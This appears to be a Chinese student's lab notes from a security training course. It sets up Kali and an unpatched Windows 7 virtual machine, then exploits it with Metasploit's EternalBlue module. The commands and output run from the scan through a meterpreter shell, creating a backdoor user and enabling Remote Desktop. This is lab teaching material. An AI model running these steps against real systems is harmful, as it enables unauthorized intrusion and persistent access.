admin管理员组文章数量:1566617
老男孩网路网络安全集训营
- 一、预备知识
- 二、kali虚拟机的配置
- 三、搭建Windows 7 旗舰版虚拟机
- 四、攻击靶机
- 五、遇到的问题
请正确使用本文内容,不得做违法的操作,如有违反概不负责。
一、预备知识
-
网络安全定位、现状
-
网关:是网络中实现不同网络之间连接和数据传输的关键节点。起到路由、转发和连接的不同网络的作用。
二、kali虚拟机的配置
- 下载kali虚拟机(直接用的压缩包)
- 配置网络连接方式
- 桥接:测试连接网络成功
- NAT:测试不成功
- 进入kali虚拟机:用户名密码都是kali
- 打开终端查看IP
- 登录到root环境:
sudo su -
- 开启远程服务:
/etc/init.d/ssh start
- 让SSH远程服务开机自启动:
update-rc.d ssh enable
- 使用xshell远程连接kali
三、搭建Windows 7 旗舰版虚拟机
- 典型创立虚拟机,不用自己配置
- 直接用安装光盘文件,不要稍后安装,稍后安装会更新Windows7使目标漏洞修复。
- 搭建完成Windows7之后关闭防火墙。
- 查看IP地址
四、攻击靶机
- 攻击原理:利用kali中的已经写好的程序攻击已知的漏洞。
- 漏洞名称:Windows7永恒之蓝
- 具体操作步骤
- 将kali切换到root账户下
sudo su -
┌──(kali?kali)-[~] └─$ sudo su - [sudo] password for kali: ┏━(Message from Kali developers) ┃ ┃ We have kept /usr/bin/python pointing to Python 2 for backwards ┃ compatibility. Learn how to change this and avoid this message: ┃ ? https://www.kali/docs/general-use/python3-transition/ ┃ ┗━(Run “touch ~/.hushlogin” to hide this message) ┌──(root??kali)-[~] └─#
- 检查是否能ping通靶机
- 扫描135,445端口(samba端口)
nmap -p 139,445 -Pn 靶机IP
┌──(root💀kali)-[~] └─# nmap -p 139,445 -Pn 172.20.10.8 139/tcp open netbios-ssn 445/tcp open microsoft-ds(主要看这两个是否为打开的状态)
- 进入到kali进攻环境
msfconsole
┌──(root💀kali)-[~] └─# msfconsole
- 搜索永恒之蓝漏洞攻击程序
search ms17-010
msf6 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
- 查看攻击程序可使用范围 建议用序号(这个用的是2号)
info 2
msf6 > info 2 Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Module: exploit/windows/smb/ms17_010_eternalblue Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Average Disclosed: 2017-03-14 Provided by: Sean Dillon <sean.dillon@risksense> Dylan Davis <dylan.davis@risksense> Equation Group Shadow Brokers thelightcosine Available targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload information: Space: 2000 Description: This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads. References: https://docs.microsoft/en-us/security-updates/SecurityBulletins/2017/MS17-010 https://cvedetails/cve/CVE-2017-0143/ https://cvedetails/cve/CVE-2017-0144/ https://cvedetails/cve/CVE-2017-0145/ https://cvedetails/cve/CVE-2017-0146/ https://cvedetails/cve/CVE-2017-0147/ https://cvedetails/cve/CVE-2017-0148/ https://github/RiskSense-Ops/MS17-010 Also known as: ETERNALBLUE
- 使用漏洞攻击程序
use 2
msf6 > use 2 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
- 设置攻击靶机的IP
set rhosts 靶机IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.20.10.8 rhosts => 172.20.10.8
- 执行攻击程序
run
(WIN就可以)msf6 exploit(windows/smb/ms17_010_eternalblue) > run [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- 进入靶机的docs环境
shell
meterpreter > shell Process 2104 created. Channel 1 created. Microsoft Windows [°汾 6.1.7600] °爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£ C:\Windows\system32>
- 创建用户
C:\Windows\system32>net user oldgirl 123 /add net user oldgirl 123 /add ļ®³ɹ¦Ϊ³ɡ£
- 添加为管理员
C:\Windows\system32>nat localgroup administrators oldgirl /add nat localgroup administrators oldgirl /add 'nat' ²»ˇŚ²¿»¿ļ®£¬Ҳ²»ˇ¿ʔ̐еij͐ »¦mτ¼þ¡£
- 退出靶机
C:\Windows\system32>exit exit meterpreter > run post/windows/manage/enable_rdp [*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230519030303_default_172.20.10.8_host.windows.cle_231609.txt meterpreter >
- 远程激活靶机桌面
meterpreter > run post/windows/manage/enable_rdp
- 在这之后就可以使用远程桌面连接连接到靶机了。
- 将kali切换到root账户下
五、遇到的问题
- 在NAT模式下连接不到网络
- 第一次实验
- 改动:更改虚拟机的虚拟网络编辑器,把网关从10.0.0.254改为10.0.0.1和主机终端显示的网关保持一致。
- 实验结果:失败
- 第二次实验
- 改动:允许防火墙接收来自虚拟机的ICMP请求
- 实验结果:失败
- 第三次实验
- 改动:删除虚拟机重新听课安装,并且不用NAT模式用桥接模式
- 实验结构:成功
- 原因:重新听一遍视频之后,发现没有在kali虚拟机启动远程连接服务。但是还是没有发现NAT模式下为什么不能用
- 第一次实验
- 连接不到网络的几个原因
- 桥接状态下
- 主机的防火墙把虚拟机的请求阻挡在外边
- IP和网关没有和主机的匹配
- VMware虚拟网关有问题
- 在虚拟机端没有启动远程连接服务
- 桥接状态下
版权声明:本文标题:2023.5.15老男孩网络安全集训营第一节 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1726787720a1084610.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论